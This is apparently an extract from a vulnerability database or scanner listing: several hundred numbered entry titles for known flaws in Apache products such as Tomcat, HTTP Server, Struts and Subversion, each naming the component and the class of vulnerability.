| [85871] Apache HTTP Server mod_session_dbd unspecified
| [85756] Apache Struts OGNL expression command execution
| [85755] Apache Struts DefaultActionMapper class open redirect
| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
| [85574] Apache HTTP Server mod_dav denial of service
| [85573] Apache Struts Showcase App OGNL code execution
| [85496] Apache CXF denial of service
| [85423] Apache Geronimo RMI classloader code execution
| [85326] Apache Santuario XML Security for C++ buffer overflow
| [85323] Apache Santuario XML Security for Java spoofing
| [85319] Apache Qpid Python client SSL spoofing
| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
| [84952] Apache Tomcat CVE-2012-3544 denial of service
| [84763] Apache Struts CVE-2013-2135 security bypass
| [84762] Apache Struts CVE-2013-2134 security bypass
| [84719] Apache Subversion CVE-2013-2088 command execution
| [84718] Apache Subversion CVE-2013-2112 denial of service
| [84717] Apache Subversion CVE-2013-1968 denial of service
| [84577] Apache Tomcat security bypass
| [84576] Apache Tomcat symlink
| [84543] Apache Struts CVE-2013-2115 security bypass
| [84542] Apache Struts CVE-2013-1966 security bypass
| [84154] Apache Tomcat session hijacking
| [84144] Apache Tomcat denial of service
| [84143] Apache Tomcat information disclosure
| [84111] Apache HTTP Server command execution
| [84043] Apache Virtual Computing Lab cross-site scripting
| [84042] Apache Virtual Computing Lab cross-site scripting
| [83782] Apache CloudStack information disclosure
| [83781] Apache CloudStack security bypass
| [83720] Apache ActiveMQ cross-site scripting
| [83719] Apache ActiveMQ denial of service
| [83718] Apache ActiveMQ denial of service
| [83263] Apache Subversion denial of service
| [83262] Apache Subversion denial of service
| [83261] Apache Subversion denial of service
| [83259] Apache Subversion denial of service
| [83035] Apache mod_ruid2 security bypass
| [82852] Apache Qpid federation_tag security bypass
| [82851] Apache Qpid qpid::framing::Buffer denial of service
| [82758] Apache Rave User RPC API information disclosure
| [82663] Apache Subversion svn_fs_file_length() denial of service
| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
| [82641] Apache Qpid AMQP denial of service
| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
| [82618] Apache Commons FileUpload symlink
| [82360] Apache HTTP Server manager interface cross-site scripting
| [82359] Apache HTTP Server hostnames cross-site scripting
| [82338] Apache Tomcat log/logdir information disclosure
| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
| [82268] Apache OpenJPA deserialization command execution
| [81981] Apache CXF UsernameTokens security bypass
| [81980] Apache CXF WS-Security security bypass
| [81398] Apache OFBiz cross-site scripting
| [81240] Apache CouchDB directory traversal
| [81226] Apache CouchDB JSONP code execution
| [81225] Apache CouchDB Futon user interface cross-site scripting
| [81211] Apache Axis2/C SSL spoofing
| [81167] Apache CloudStack DeployVM information disclosure
| [81166] Apache CloudStack AddHost API information disclosure
| [81165] Apache CloudStack createSSHKeyPair API information disclosure
| [80518] Apache Tomcat cross-site request forgery security bypass
| [80517] Apache Tomcat FormAuthenticator security bypass
| [80516] Apache Tomcat NIO denial of service
| [80408] Apache Tomcat replay-countermeasure security bypass
| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
| [80317] Apache Tomcat slowloris denial of service
| [79984] Apache Commons HttpClient SSL spoofing
| [79983] Apache CXF SSL spoofing
| [79830] Apache Axis2/Java SSL spoofing
| [79829] Apache Axis SSL spoofing
| [79809] Apache Tomcat DIGEST security bypass
| [79806] Apache Tomcat parseHeaders() denial of service
| [79540] Apache OFBiz unspecified
| [79487] Apache Axis2 SAML security bypass
| [79212] Apache Cloudstack code execution
| [78734] Apache CXF SOAP Action security bypass
| [78730] Apache Qpid broker denial of service
| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
| [78563] Apache mod_pagespeed module unspecified cross-site scripting
| [78562] Apache mod_pagespeed module security bypass
| [78454] Apache Axis2 security bypass
| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
10346| [78321] Apache Wicket unspecified cross-site scripting
10347| [78183] Apache Struts parameters denial of service
10348| [78182] Apache Struts cross-site request forgery
10349| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
10350| [77987] mod_rpaf module for Apache denial of service
10351| [77958] Apache Struts skill name code execution
10352| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
10353| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
10354| [77568] Apache Qpid broker security bypass
10355| [77421] Apache Libcloud spoofing
10356| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
10357| [77046] Oracle Solaris Apache HTTP Server information disclosure
10358| [76837] Apache Hadoop information disclosure
10359| [76802] Apache Sling CopyFrom denial of service
10360| [76692] Apache Hadoop symlink
10361| [76535] Apache Roller console cross-site request forgery
10362| [76534] Apache Roller weblog cross-site scripting
10363| [76152] Apache CXF elements security bypass
10364| [76151] Apache CXF child policies security bypass
10365| [75983] MapServer for Windows Apache file include
10366| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
10367| [75558] Apache POI denial of service
10368| [75545] PHP apache_request_headers() buffer overflow
10369| [75302] Apache Qpid SASL security bypass
10370| [75211] Debian GNU/Linux apache 2 cross-site scripting
10371| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
10372| [74871] Apache OFBiz FlexibleStringExpander code execution
10373| [74870] Apache OFBiz multiple cross-site scripting
10374| [74750] Apache Hadoop unspecified spoofing
10375| [74319] Apache Struts XSLTResult.java file upload
10376| [74313] Apache Traffic Server header buffer overflow
10377| [74276] Apache Wicket directory traversal
10378| [74273] Apache Wicket unspecified cross-site scripting
10379| [74181] Apache HTTP Server mod_fcgid module denial of service
10380| [73690] Apache Struts OGNL code execution
10381| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
10382| [73100] Apache MyFaces in directory traversal
10383| [73096] Apache APR hash denial of service
10384| [73052] Apache Struts name cross-site scripting
10385| [73030] Apache CXF UsernameToken security bypass
10386| [72888] Apache Struts lastName cross-site scripting
10387| [72758] Apache HTTP Server httpOnly information disclosure
10388| [72757] Apache HTTP Server MPM denial of service
10389| [72585] Apache Struts ParameterInterceptor security bypass
10390| [72438] Apache Tomcat Digest security bypass
10391| [72437] Apache Tomcat Digest security bypass
10392| [72436] Apache Tomcat DIGEST security bypass
10393| [72425] Apache Tomcat parameter denial of service
10394| [72422] Apache Tomcat request object information disclosure
10395| [72377] Apache HTTP Server scoreboard security bypass
10396| [72345] Apache HTTP Server HTTP request denial of service
10397| [72229] Apache Struts ExceptionDelegator command execution
10398| [72089] Apache Struts ParameterInterceptor directory traversal
10399| [72088] Apache Struts CookieInterceptor command execution
10400| [72047] Apache Geronimo hash denial of service
10401| [72016] Apache Tomcat hash denial of service
10402| [71711] Apache Struts OGNL expression code execution
10403| [71654] Apache Struts interfaces security bypass
10404| [71620] Apache ActiveMQ failover denial of service
10405| [71617] Apache HTTP Server mod_proxy module information disclosure
10406| [71508] Apache MyFaces EL security bypass
10407| [71445] Apache HTTP Server mod_proxy security bypass
10408| [71203] Apache Tomcat servlets privilege escalation
10409| [71181] Apache HTTP Server ap_pregsub() denial of service
10410| [71093] Apache HTTP Server ap_pregsub() buffer overflow
10411| [70336] Apache HTTP Server mod_proxy information disclosure
10412| [69804] Apache HTTP Server mod_proxy_ajp denial of service
10413| [69472] Apache Tomcat AJP security bypass
10414| [69396] Apache HTTP Server ByteRange filter denial of service
10415| [69394] Apache Wicket multi window support cross-site scripting
10416| [69176] Apache Tomcat XML information disclosure
10417| [69161] Apache Tomcat jsvc information disclosure
10418| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
10419| [68541] Apache Tomcat sendfile information disclosure
10420| [68420] Apache XML Security denial of service
10421| [68238] Apache Tomcat JMX information disclosure
10422| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
10423| [67804] Apache Subversion control rules information disclosure
10424| [67803] Apache Subversion control rules denial of service
10425| [67802] Apache Subversion baselined denial of service
10426| [67672] Apache Archiva multiple cross-site scripting
10427| [67671] Apache Archiva multiple cross-site request forgery
10428| [67564] Apache APR apr_fnmatch() denial of service
10429| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
10430| [67515] Apache Tomcat annotations security bypass
10431| [67480] Apache Struts s:submit information disclosure
10432| [67414] Apache APR apr_fnmatch() denial of service
10433| [67356] Apache Struts javatemplates cross-site scripting
10434| [67354] Apache Struts Xwork cross-site scripting
10435| [66676] Apache Tomcat HTTP BIO information disclosure
10436| [66675] Apache Tomcat web.xml security bypass
10437| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
10438| [66241] Apache HttpComponents information disclosure
10439| [66154] Apache Tomcat ServletSecurity security bypass
10440| [65971] Apache Tomcat ServletSecurity security bypass
10441| [65876] Apache Subversion mod_dav_svn denial of service
10442| [65343] Apache Continuum unspecified cross-site scripting
10443| [65162] Apache Tomcat NIO connector denial of service
10444| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
10445| [65160] Apache Tomcat HTML Manager interface cross-site scripting
10446| [65159] Apache Tomcat ServletContect security bypass
10447| [65050] Apache CouchDB web-based administration UI cross-site scripting
10448| [64773] Oracle HTTP Server Apache Plugin unauthorized access
10449| [64473] Apache Subversion blame -g denial of service
10450| [64472] Apache Subversion walk() denial of service
10451| [64407] Apache Axis2 CVE-2010-0219 code execution
10452| [63926] Apache Archiva password privilege escalation
10453| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
10454| [63493] Apache Archiva credentials cross-site request forgery
10455| [63477] Apache Tomcat HttpOnly session hijacking
10456| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
10457| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
10458| [62959] Apache Shiro filters security bypass
10459| [62790] Apache Perl cgi module denial of service
10460| [62576] Apache Qpid exchange denial of service
10461| [62575] Apache Qpid AMQP denial of service
10462| [62354] Apache Qpid SSL denial of service
10463| [62235] Apache APR-util apr_brigade_split_line() denial of service
10464| [62181] Apache XML-RPC SAX Parser information disclosure
10465| [61721] Apache Traffic Server cache poisoning
10466| [61202] Apache Derby BUILTIN authentication functionality information disclosure
10467| [61186] Apache CouchDB Futon cross-site request forgery
10468| [61169] Apache CXF DTD denial of service
10469| [61070] Apache Jackrabbit search.jsp SQL injection
10470| [61006] Apache SLMS Quoting cross-site request forgery
10471| [60962] Apache Tomcat time cross-site scripting
10472| [60883] Apache mod_proxy_http information disclosure
10473| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
10474| [60264] Apache Tomcat Transfer-Encoding denial of service
10475| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
10476| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
10477| [59413] Apache mod_proxy_http timeout information disclosure
10478| [59058] Apache MyFaces unencrypted view state cross-site scripting
10479| [58827] Apache Axis2 xsd file include
10480| [58790] Apache Axis2 modules cross-site scripting
10481| [58299] Apache ActiveMQ queueBrowse cross-site scripting
10482| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
10483| [58056] Apache ActiveMQ .jsp source code disclosure
10484| [58055] Apache Tomcat realm name information disclosure
10485| [58046] Apache HTTP Server mod_auth_shadow security bypass
10486| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
10487| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
10488| [57429] Apache CouchDB algorithms information disclosure
10489| [57398] Apache ActiveMQ Web console cross-site request forgery
10490| [57397] Apache ActiveMQ createDestination.action cross-site scripting
10491| [56653] Apache HTTP Server DNS spoofing
10492| [56652] Apache HTTP Server DNS cross-site scripting
10493| [56625] Apache HTTP Server request header information disclosure
10494| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
10495| [56623] Apache HTTP Server mod_proxy_ajp denial of service
10496| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
10497| [55857] Apache Tomcat WAR files directory traversal
10498| [55856] Apache Tomcat autoDeploy attribute security bypass
10499| [55855] Apache Tomcat WAR directory traversal
10500| [55210] Intuit component for Joomla! Apache information disclosure
10501| [54533] Apache Tomcat 404 error page cross-site scripting
10502| [54182] Apache Tomcat admin default password
10503| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
10504| [53666] Apache HTTP Server Solaris pollset support denial of service
10505| [53650] Apache HTTP Server HTTP basic-auth module security bypass
10506| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
10507| [53041] mod_proxy_ftp module for Apache denial of service
10508| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
10509| [51953] Apache Tomcat Path Disclosure
10510| [51952] Apache Tomcat Path Traversal
10511| [51951] Apache stronghold-status Information Disclosure
10512| [51950] Apache stronghold-info Information Disclosure
10513| [51949] Apache PHP Source Code Disclosure
10514| [51948] Apache Multiviews Attack
10515| [51946] Apache JServ Environment Status Information Disclosure
10516| [51945] Apache error_log Information Disclosure
10517| [51944] Apache Default Installation Page Pattern Found
10518| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
10519| [51942] Apache AXIS XML External Entity File Retrieval
10520| [51941] Apache AXIS Sample Servlet Information Leak
10521| [51940] Apache access_log Information Disclosure
10522| [51626] Apache mod_deflate denial of service
10523| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
10524| [51365] Apache Tomcat RequestDispatcher security bypass
10525| [51273] Apache HTTP Server Incomplete Request denial of service
10526| [51195] Apache Tomcat XML information disclosure
10527| [50994] Apache APR-util xml/apr_xml.c denial of service
10528| [50993] Apache APR-util apr_brigade_vprintf denial of service
10529| [50964] Apache APR-util apr_strmatch_precompile() denial of service
10530| [50930] Apache Tomcat j_security_check information disclosure
10531| [50928] Apache Tomcat AJP denial of service
10532| [50884] Apache HTTP Server XML ENTITY denial of service
10533| [50808] Apache HTTP Server AllowOverride privilege escalation
10534| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
10535| [50059] Apache mod_proxy_ajp information disclosure
10536| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
10537| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
10538| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
10539| [49921] Apache ActiveMQ Web interface cross-site scripting
10540| [49898] Apache Geronimo Services/Repository directory traversal
10541| [49725] Apache Tomcat mod_jk module information disclosure
10542| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
10543| [49712] Apache Struts unspecified cross-site scripting
10544| [49213] Apache Tomcat cal2.jsp cross-site scripting
10545| [48934] Apache Tomcat POST doRead method information disclosure
10546| [48211] Apache Tomcat header HTTP request smuggling
10547| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
10548| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
10549| [47709] Apache Roller "
10550| [47104] Novell Netware ApacheAdmin console security bypass
10551| [47086] Apache HTTP Server OS fingerprinting unspecified
10552| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
10553| [45791] Apache Tomcat RemoteFilterValve security bypass
10554| [44435] Oracle WebLogic Apache Connector buffer overflow
10555| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
10556| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
10557| [44156] Apache Tomcat RequestDispatcher directory traversal
10558| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
10559| [43885] Oracle WebLogic Server Apache Connector buffer overflow
10560| [42987] Apache HTTP Server mod_proxy module denial of service
10561| [42915] Apache Tomcat JSP files path disclosure
10562| [42914] Apache Tomcat MS-DOS path disclosure
10563| [42892] Apache Tomcat unspecified unauthorized access
10564| [42816] Apache Tomcat Host Manager cross-site scripting
10565| [42303] Apache 403 error cross-site scripting
10566| [41618] Apache-SSL ExpandCert() authentication bypass
10567| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
10568| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
10569| [40614] Apache mod_jk2 HTTP Host header buffer overflow
10570| [40562] Apache Geronimo init information disclosure
10571| [40478] Novell Web Manager webadmin-apache.conf security bypass
10572| [40411] Apache Tomcat exception handling information disclosure
10573| [40409] Apache Tomcat native (APR based) connector weak security
10574| [40403] Apache Tomcat quotes and %5C cookie information disclosure
10575| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
10576| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
10577| [39867] Apache HTTP Server mod_negotiation cross-site scripting
10578| [39804] Apache Tomcat SingleSignOn information disclosure
10579| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
10580| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
10581| [39608] Apache HTTP Server balancer manager cross-site request forgery
10582| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
10583| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
10584| [39472] Apache HTTP Server mod_status cross-site scripting
10585| [39201] Apache Tomcat JULI logging weak security
10586| [39158] Apache HTTP Server Windows SMB shares information disclosure
10587| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
10588| [38951] Apache::AuthCAS Perl module cookie SQL injection
10589| [38800] Apache HTTP Server 413 error page cross-site scripting
10590| [38211] Apache Geronimo SQLLoginModule authentication bypass
10591| [37243] Apache Tomcat WebDAV directory traversal
10592| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
10593| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
10594| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
10595| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
10596| [36782] Apache Geronimo MEJB unauthorized access
10597| [36586] Apache HTTP Server UTF-7 cross-site scripting
10598| [36468] Apache Geronimo LoginModule security bypass
10599| [36467] Apache Tomcat functions.jsp cross-site scripting
10600| [36402] Apache Tomcat calendar cross-site request forgery
10601| [36354] Apache HTTP Server mod_proxy module denial of service
10602| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
10603| [36336] Apache Derby lock table privilege escalation
10604| [36335] Apache Derby schema privilege escalation
10605| [36006] Apache Tomcat "
10606| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
10607| [35999] Apache Tomcat \"
10608| [35795] Apache Tomcat CookieExample cross-site scripting
10609| [35536] Apache Tomcat SendMailServlet example cross-site scripting
10610| [35384] Apache HTTP Server mod_cache module denial of service
10611| [35097] Apache HTTP Server mod_status module cross-site scripting
10612| [35095] Apache HTTP Server Prefork MPM module denial of service
10613| [34984] Apache HTTP Server recall_headers information disclosure
10614| [34966] Apache HTTP Server MPM content spoofing
10615| [34965] Apache HTTP Server MPM information disclosure
10616| [34963] Apache HTTP Server MPM multiple denial of service
10617| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
10618| [34869] Apache Tomcat JSP example Web application cross-site scripting
10619| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
10620| [34496] Apache Tomcat JK Connector security bypass
10621| [34377] Apache Tomcat hello.jsp cross-site scripting
10622| [34212] Apache Tomcat SSL configuration security bypass
10623| [34210] Apache Tomcat Accept-Language cross-site scripting
10624| [34209] Apache Tomcat calendar application cross-site scripting
10625| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
10626| [34167] Apache Axis WSDL file path disclosure
10627| [34068] Apache Tomcat AJP connector information disclosure
10628| [33584] Apache HTTP Server suEXEC privilege escalation
10629| [32988] Apache Tomcat proxy module directory traversal
10630| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
10631| [32708] Debian Apache tty privilege escalation
10632| [32441] ApacheStats extract() PHP call unspecified
10633| [32128] Apache Tomcat default account
10634| [31680] Apache Tomcat RequestParamExample cross-site scripting
10635| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
10636| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
10637| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
10638| [30456] Apache mod_auth_kerb off-by-one buffer overflow
10639| [29550] Apache mod_tcl set_var() format string
10640| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
10641| [28357] Apache HTTP Server mod_alias script source information disclosure
10642| [28063] Apache mod_rewrite off-by-one buffer overflow
10643| [27902] Apache Tomcat URL information disclosure
10644| [26786] Apache James SMTP server denial of service
10645| [25680] libapache2 /tmp/svn file upload
10646| [25614] Apache Struts lookupMap cross-site scripting
10647| [25613] Apache Struts ActionForm denial of service
10648| [25612] Apache Struts isCancelled() security bypass
10649| [24965] Apache mod_python FileSession command execution
10650| [24716] Apache James spooler memory leak denial of service
10651| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
10652| [24158] Apache Geronimo jsp-examples cross-site scripting
10653| [24030] Apache auth_ldap module multiple format strings
10654| [24008] Apache mod_ssl custom error message denial of service
10655| [24003] Apache mod_auth_pgsql module multiple syslog format strings
10656| [23612] Apache mod_imap referer field cross-site scripting
10657| [23173] Apache Struts error message cross-site scripting
10658| [22942] Apache Tomcat directory listing denial of service
10659| [22858] Apache Multi-Processing Module code allows denial of service
10660| [22602] RHSA-2005:582 updates for Apache httpd not installed
10661| [22520] Apache mod-auth-shadow "
10662| [22466] ApacheTop symlink
10663| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
10664| [22006] Apache HTTP Server byte-range filter denial of service
10665| [21567] Apache mod_ssl off-by-one buffer overflow
10666| [21195] Apache HTTP Server header HTTP request smuggling
10667| [20383] Apache HTTP Server htdigest buffer overflow
10668| [19681] Apache Tomcat AJP12 request denial of service
10669| [18993] Apache HTTP server check_forensic symlink attack
10670| [18790] Apache Tomcat Manager cross-site scripting
10671| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
10672| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
10673| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
10674| [17961] Apache Web server ServerTokens has not been set
10675| [17930] Apache HTTP Server HTTP GET request denial of service
10676| [17785] Apache mod_include module buffer overflow
10677| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
10678| [17473] Apache HTTP Server Satisfy directive allows access to resources
10679| [17413] Apache htpasswd buffer overflow
10680| [17384] Apache HTTP Server environment variable configuration file buffer overflow
10681| [17382] Apache HTTP Server IPv6 apr_util denial of service
10682| [17366] Apache HTTP Server mod_dav module LOCK denial of service
10683| [17273] Apache HTTP Server speculative mode denial of service
10684| [17200] Apache HTTP Server mod_ssl denial of service
10685| [16890] Apache HTTP Server server-info request has been detected
10686| [16889] Apache HTTP Server server-status request has been detected
10687| [16705] Apache mod_ssl format string attack
10688| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
10689| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
10690| [16230] Apache HTTP Server PHP denial of service
10691| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
10692| [15958] Apache HTTP Server authentication modules memory corruption
10693| [15547] Apache HTTP Server mod_disk_cache local information disclosure
10694| [15540] Apache HTTP Server socket starvation denial of service
10695| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
10696| [15422] Apache HTTP Server mod_access information disclosure
10697| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
10698| [15293] Apache for Cygwin "
10699| [15065] Apache-SSL has a default password
10700| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
10701| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
10702| [14751] Apache Mod_python output filter information disclosure
10703| [14125] Apache HTTP Server mod_userdir module information disclosure
10704| [14075] Apache HTTP Server mod_php file descriptor leak
10705| [13703] Apache HTTP Server account
10706| [13689] Apache HTTP Server configuration allows symlinks
10707| [13688] Apache HTTP Server configuration allows SSI
10708| [13687] Apache HTTP Server Server: header value
10709| [13685] Apache HTTP Server ServerTokens value
10710| [13684] Apache HTTP Server ServerSignature value
10711| [13672] Apache HTTP Server config allows directory autoindexing
10712| [13671] Apache HTTP Server default content
10713| [13670] Apache HTTP Server config file directive references outside content root
10714| [13668] Apache HTTP Server httpd not running in chroot environment
10715| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
10716| [13664] Apache HTTP Server config file contains ScriptAlias entry
10717| [13663] Apache HTTP Server CGI support modules loaded
10718| [13661] Apache HTTP Server config file contains AddHandler entry
10719| [13660] Apache HTTP Server 500 error page not CGI script
10720| [13659] Apache HTTP Server 413 error page not CGI script
10721| [13658] Apache HTTP Server 403 error page not CGI script
10722| [13657] Apache HTTP Server 401 error page not CGI script
10723| [13552] Apache HTTP Server mod_cgid module information disclosure
10724| [13550] Apache GET request directory traversal
10725| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
10726| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
10727| [13429] Apache Tomcat non-HTTP request denial of service
10728| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
10729| [13295] Apache weak password encryption
10730| [13254] Apache Tomcat .jsp cross-site scripting
10731| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
10732| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
10733| [12681] Apache HTTP Server mod_proxy could allow mail relaying
10734| [12662] Apache HTTP Server rotatelogs denial of service
10735| [12554] Apache Tomcat stores password in plain text
10736| [12553] Apache HTTP Server redirects and subrequests denial of service
10737| [12552] Apache HTTP Server FTP proxy server denial of service
10738| [12551] Apache HTTP Server prefork MPM denial of service
10739| [12550] Apache HTTP Server weaker than expected encryption
10740| [12549] Apache HTTP Server type-map file denial of service
10741| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
10742| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
10743| [12091] Apache HTTP Server apr_password_validate denial of service
10744| [12090] Apache HTTP Server apr_psprintf code execution
10745| [11804] Apache HTTP Server mod_access_referer denial of service
10746| [11750] Apache HTTP Server could leak sensitive file descriptors
10747| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
10748| [11703] Apache long slash path allows directory listing
10749| [11695] Apache HTTP Server LF (Line Feed) denial of service
10750| [11694] Apache HTTP Server filestat.c denial of service
10751| [11438] Apache HTTP Server MIME message boundaries information disclosure
10752| [11412] Apache HTTP Server error log terminal escape sequence injection
10753| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
10754| [11195] Apache Tomcat web.xml could be used to read files
10755| [11194] Apache Tomcat URL appended with a null character could list directories
10756| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
10757| [11126] Apache HTTP Server illegal character file disclosure
10758| [11125] Apache HTTP Server DOS device name HTTP POST code execution
10759| [11124] Apache HTTP Server DOS device name denial of service
10760| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
10761| [10938] Apache HTTP Server printenv test CGI cross-site scripting
10762| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
10763| [10575] Apache mod_php module could allow an attacker to take over the httpd process
10764| [10499] Apache HTTP Server WebDAV HTTP POST view source
10765| [10457] Apache HTTP Server mod_ssl "
10766| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
10767| [10414] Apache HTTP Server htdigest multiple buffer overflows
10768| [10413] Apache HTTP Server htdigest temporary file race condition
10769| [10412] Apache HTTP Server htpasswd temporary file race condition
10770| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
10771| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
10772| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
10773| [10280] Apache HTTP Server shared memory scorecard overwrite
10774| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
10775| [10241] Apache HTTP Server Host: header cross-site scripting
10776| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
10777| [10208] Apache HTTP Server mod_dav denial of service
10778| [10206] HP VVOS Apache mod_ssl denial of service
10779| [10200] Apache HTTP Server stderr denial of service
10780| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
10781| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
10782| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
10783| [10098] Slapper worm targets OpenSSL/Apache systems
10784| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
10785| [9875] Apache HTTP Server .var file request could disclose installation path
10786| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
10787| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
10788| [9623] Apache HTTP Server ap_log_rerror() path disclosure
10789| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
10790| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
10791| [9396] Apache Tomcat null character to threads denial of service
10792| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
10793| [9249] Apache HTTP Server chunked encoding heap buffer overflow
10794| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
10795| [8932] Apache Tomcat example class information disclosure
10796| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
10797| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
10798| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
10799| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
10800| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
10801| [8400] Apache HTTP Server mod_frontpage buffer overflows
10802| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
